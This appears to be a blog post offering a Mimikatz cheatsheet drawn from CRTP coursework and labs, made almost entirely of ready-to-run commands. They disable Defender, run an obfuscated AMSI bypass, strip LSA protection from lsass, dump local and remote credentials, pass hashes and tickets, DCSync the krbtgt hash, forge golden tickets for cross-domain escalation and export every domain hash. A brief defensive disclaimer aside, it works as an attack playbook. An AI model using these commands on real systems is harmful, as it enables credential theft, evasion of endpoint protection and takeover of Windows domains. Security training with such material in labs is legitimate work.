TL;DR Mimikatz cheatsheet of things I have found useful in CRTP and the lab.
Welcome to Part I of our cheatsheet series compiled from various courses, labs, stuff we did at work, Google, etc. Most of this was spread out over various howtos. This puts it all in one place. These are cheatsheets, almost no explanation is given, just commands. The links are to howtos that provide background.
Part I: Mimikatz cheatsheet
Part II: Set-Acl cheatsheet
Part III: Get-Acl cheatsheet
Part IV: Enumerating AD cheatsheet
Part V: Windows reverse shells cheatsheet
Part VI: MS Graph PowerShell cheatsheet
Part VII: Hash cracking cheatsheet
Part VIII: The Credential Theft Shuffle
Part IX: SACLs & Querying Collected Logs
Part X: Setting up a simple AD lab in Azure
Background
Yes, this info is out there already, most notably Sean Metcalf’s Guide to Mimikatz. This is just my personal cheatsheet for Mimikatz compiled from my notes taken during various labs, the CRTP course, etc.
Please note that I was using Invoke-Mimikatz.ps1 most of the time, therefore my cheatsheet is heavy on commands in that syntax. Generally speaking, if you’re using the *.exe then just run what is inside the quotes. I am also partial to PowerShell_ISE.
Please note that you can run multiple commands with Invoke-Mimikatz.ps1 by simply enclosing the entire thing in single quotes and each command in double quotes. Example:
Invoke-Mimikatz -Command ‘”token::elevate” “privilege::debug” “sekurlsa::msv”’Please note that Medium often mangles quotations, even in codeblocks. If you copy/paste a command and get an error then re-type the quotes in the CLI.
Running Mimikatz at all
Defender will block an unaltered copy of Mimikatz. Please do NOT rely on this alone in the workplace. Mimikatz is open source and freely available, therefore a dedicated attacker will simply modify it enough to not trip Defender. These researchers did it just to prove a point. Therefore focus on denying an attacker the rights needed to dump credentials. Failing that, focus on basic security hygiene so there isn’t anything usable in the dump.
With that disclaimer out of the way, here is how I have used Mimikatz in labs, CRTP, etc.
Launch PowerShell as admin, add a folder exception to Defender, turn off real time monitoring:
Start-Process PowerShell_ISE -Verb RunASAdd-MpPreference -ExclusionPath “C:\Temp”Set-MpPreference -DisableRealTimeMonitoring $trueImport-Module C:\Temp\Invoke-Mimikatz.ps1
Alternatively you can often get away with just running the AMSI bypass if you can’t turn off Defender. I have used this tactic with PowerView and PowerUp in the past:
S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )
Bypassing LSA protection
Additionally, if Mimkatz has an issue with LSA protection this can be disabled by the local admin. If this issue occurs you will likely see something along the lines of
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)This protection can be disabled by loading a Mimikatz driver, and credentials can then be dumped.
!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords
Dumping creds with Mimikatz:
This is normally required first if running Mimikatz locally:
Invoke-Mimikatz -Command ‘“token::elevate”’Invoke-Mimikatz -Command ‘“privilege::debug”’Invoke-Mimikatz -Command ‘“sekurlsa::logonpasswords”’
Please note that ‘logonpasswords’ lists everything except Credential Manager, as I found out once.
List the sekurlsa commands:
“sekurlsa::help”Check Credential Manager for things like saved RDP passwords:
Invoke-Mimikatz -Command ‘“token::elevate” “vault::cred /patch”’Invoke-Mimikatz -Command '"sekurlsa::credman"'
If you are using mimikatz.exe:
Start-Process C:\Temp\mimikatz_trunk\x64\mimikatz.exe -Verb RunAstoken::elevateprivilege::debugsekurlsa::msv
Other useful things to dump:
vault::cred #dump Credential Manager
lsadump::sam #dump the SAM
lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache)Pass-The-Hash (PTH) with Mimikatz
Explanation, lab demo, and mitigations are here.
PTH and launch PowerShell_ISE as that user:
Invoke-Mimikatz -Command ‘“sekurlsa::pth /user:administrator /domain:corp /ntlm:03df526c49c8684ebed22fdb3ec5c533 /run:PowerShell_ISE”’Pass-The-Ticket (PTT) with Mimikatz
Explanation, lab demo, and mitigations are here.
Export & list tickets:
$sess = New-PSSession -ComputerName TestIPAMInvoke-Command -ScriptBlock {Set-MpPreference –DisableRealTimeMonitoring $true} -ComputerName TestIPAMInvoke-Command -FilePath C:\Temp\Invoke-Mimikatz.ps1 -Session $sessEnter-PSSession $sessmkdir etccd .\etcInvoke-Mimikatz -Command ‘“sekurlsa::tickets /export”’
Copy/paste the name of the ticket to elevate with, then:
Invoke-Mimikatz -Command ‘“kerberos::ptt .\<ticket filename>”’Confirm privileges:
Invoke-Command -ScriptBlock {hostname;whoami} -ComputerName TestDCShow tickets currently in use:
klistIf you are having issues or getting weird errors, purge tickets and try again:
klist purgeDump creds remotely with Mimikatz
This only requires that you are running as a Domain User who has local admin rights on the remote system.
Invoke-Command –ScriptBlock {Set-MpPreference –DisableRealTimeMonitoring $true} –ComputerName DCInvoke-Mimikatz -DumpCreds -ComputerName DC
DCSync
Explanation & lab demo here.
Grab the krbtgt NTLM
Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:corp\krbtgt”’Forge a Golden Ticket using krbtgt hash & domain SID:
Invoke-Mimikatz -Command ‘”kerberos::golden /domain:corp.local /sid:S-1–5–21–1917967189–4054103991–136247481 /krbtgt:cb542d2484aae7b5156c9a1a7bbb31e7 /user:Administrator /id:500 /ptt”’Alternatively, save the ticket for future use:
kerberos::golden /domain:corp.local /sid:S-1–5–21–1917967189–4054103991–136247481 /krbtgt:cb542d2484aae7b5156c9a1a7bbb31e7 /user:Administrator /id:500 /ticket:forged.kirbikerberos::ptt forged.kirbimisc::cmd
Dump every hash in the domain into a file for use later:
Invoke-Mimikatz -Command ‘“token::elevate” “privilege::debug” “lsadump::dcsync /dc:BackupDC4 /domain:test.local /all /csv”’ | Export-Csv .\AllHashes.csvForge a ticket to use in a trusting domain
In this case we have compromised a child domain and want to escalate to the parent domain. There is a trust relationship between them.
Invoke-Mimikatz -Command ‘“kerberos::golden /user:Administrator /domain:<child domain FQDN> /sid:<child domain SID> /sids:<parent domain SID>-519 /krbtgt:<child domain krbtgt NTLM> /ticket:C:\AD\Tools\krbtgt_tkt.kirbi”’Load the ticket and start using privs in the parent domain:
Invoke-Mimikatz -Command ‘“kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi”’References
Benjamin Delpy’s github with Mimikatz: https://github.com/ParrotSec/mimikatz
Sean Metcalf’s guide to Mimikatz: https://adsecurity.org/?page_id=1821
Microsoft Docs on klist: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist
